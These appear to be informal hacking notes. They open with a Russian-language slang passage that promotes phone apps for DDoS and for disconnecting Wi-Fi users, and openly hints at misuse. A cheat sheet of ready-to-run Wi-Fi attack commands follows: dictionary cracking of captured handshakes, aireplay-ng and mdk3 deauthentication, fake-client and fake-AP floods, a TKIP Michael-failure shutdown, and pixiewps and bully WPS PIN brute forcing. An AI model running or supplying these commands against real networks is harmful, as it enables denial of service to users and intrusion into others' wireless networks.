Kayra the Pentester. Интересная вещица, сканер уязвимостей веб-приложений.Там все доволно просто и понятно, в плане настроек. Можно ебашить ат@ки по словам, брутить, искать по XSS (что непонятно — гугли)

👤 AnDOSid. C ним ты будешь активировать дд0с атаки со своей мобилы, разработан с0фт для стрессового тестирования, но мы то знаем, что и ручку не в тех руках — 0рYжие

👤 WiFi Kill. Ну по названию все понятно. Пару кнопок и ты отключил всех юзеров от сети вай-фай. Блочит соединение. Достать нормально работающий с0фт непросто, но если найдешь, то балуйся аккуратно

Взлом по словарю

• aircrack-ng -w test.dic test.pcap a-PMKID.pcap
  • test.dic - passwords list
  • test.pcap - full handshake
  • a-PMKID.pcap - PMKID not 00000000

Unauth

• start kismet
• get BSSID and client MAC
• aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon
  • -a BSSID
  • -c client MAC
• save PKID and handshake pcap

BFI (Beamforming Feedback Information) — функцию, введенную в 2013 году с выходом Wi-Fi 5 (802.11ac).

16 из 20 самых популярных паролей состоят только из цифр.

https://www.bleepingcomputer.com/news/security/new-wiki-eve-attack-can-steal-numerical-passwords-over-wifi/

https://en.kali.tools/?p=864 https://en.kali.tools/?p=394 https://github.com/DanMcInerney/wifijammer https://en.kali.tools/?p=90 https://packages.gentoo.org/packages/net-wireless/mdk https://github.com/aircrack-ng/mdk4 mdk3 $interface$mon d -b $path -c $ch

This floods the target AP with fake clients.

• mdk3 monX a -a xx:xx:xx:xx:xx:xx -m

This causes Michael failure, stopping all wireless traffic. However, this only works if the target AP supports TKIP. (Can be AES+TKIP)

• mdk3 monX m -t xx:xx:xx:xx:xx:xx

This keeps a continuous deauth on the network. If this attack does not start, make a blank text document in your root folder named blacklist. Leave it empty as MDK3 automatically populates the list.

• mdk3 monX d -b blacklist -c X

This floods a bunch of fake APs to any clients in range (only effective to windows clients and maybe some other devices, Macs are protected against this).

• mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X

You will know when the AP has reset either by checking with

• wash -i monX -C

you should have a total of 5 windows open at the same time: 1- airodump 2- mdk3 a 3- mdk3 b 4- mdk3 d 5- mdk3 m

I generally like to use: mdk3 monX -a 00:11:22:33:44:55 -m mdk3 monX d -b blacklist -c X mdk3 monX b -t 00:11:22:33:44:55 -c X

WPA-TKIP then also include: mdk3 monX m -t 00:11:22:33:44:55

• pixiewps https://github.com/wiire-a/pixiewps
  • pixiewps - WPS PIN exploiting the low or non-existing entropy of some software implementations
    • seconds or minutes, depending on the target, if vulnerable.
  • pixie-dust attack
  • https://github.com/wiire-a/pixiewps/wiki
  • https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool
  • https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
  • https://opensourcelibs.com/lib/pixiewps
  • https://axcheron.github.io/hacking-wps-using-reaver-and-pixie-dust-attack/
• WPS brute force https://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/

Reaver was going in ascending order for generating the pins and Bully always got a random pin. gets early while guessing randomly

bully -b 00:23:69:48:33:95

• airbase-ng - WEP, WPA, AP mode, send/encrypt packages
• aircrack-ng -
• airdecap-ng - decrypt WEP/WPA/WPA2 capture files
• airdecloak-ng - WEP - remove clocking
• airdrop-ng - deauthentication of users
• aireplay-ng - WPA2 deauthentications attacks
• airgraph-ng - Client to AP Relationship, all probed SSID by clients
• airmon-ng - start monitor mode
• airodump-ng
• airolib-ng
• airserv-ng
• airtun-ng
• besside-ng
• dcrack
• easside-ng
• packetforge-ng
• tkiptun-ng
• wesside-ng

fake AP

monitor mode

• airmon-ng check
• airmon-ng check kill
• airmon-ng start wlan0 1

packet capture - raw 802.11 frames

• airodump-ng -c <channel> –bssid <mac of AP> -w file_prefix <interface>

• aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

• emerge media-gfx/graphviz

usage

1. airodump-ng wlan0mon -w /root/Desktop/test
2. airmon-ng stop wlan0mon
3. airgraph-ng -i test-01.csv -o airgraph-test -g CARP

• https://wiki.installgentoo.com/wiki/Breaking_WPA2
• https://www.aircrack-ng.org/doku.php?id=tutorial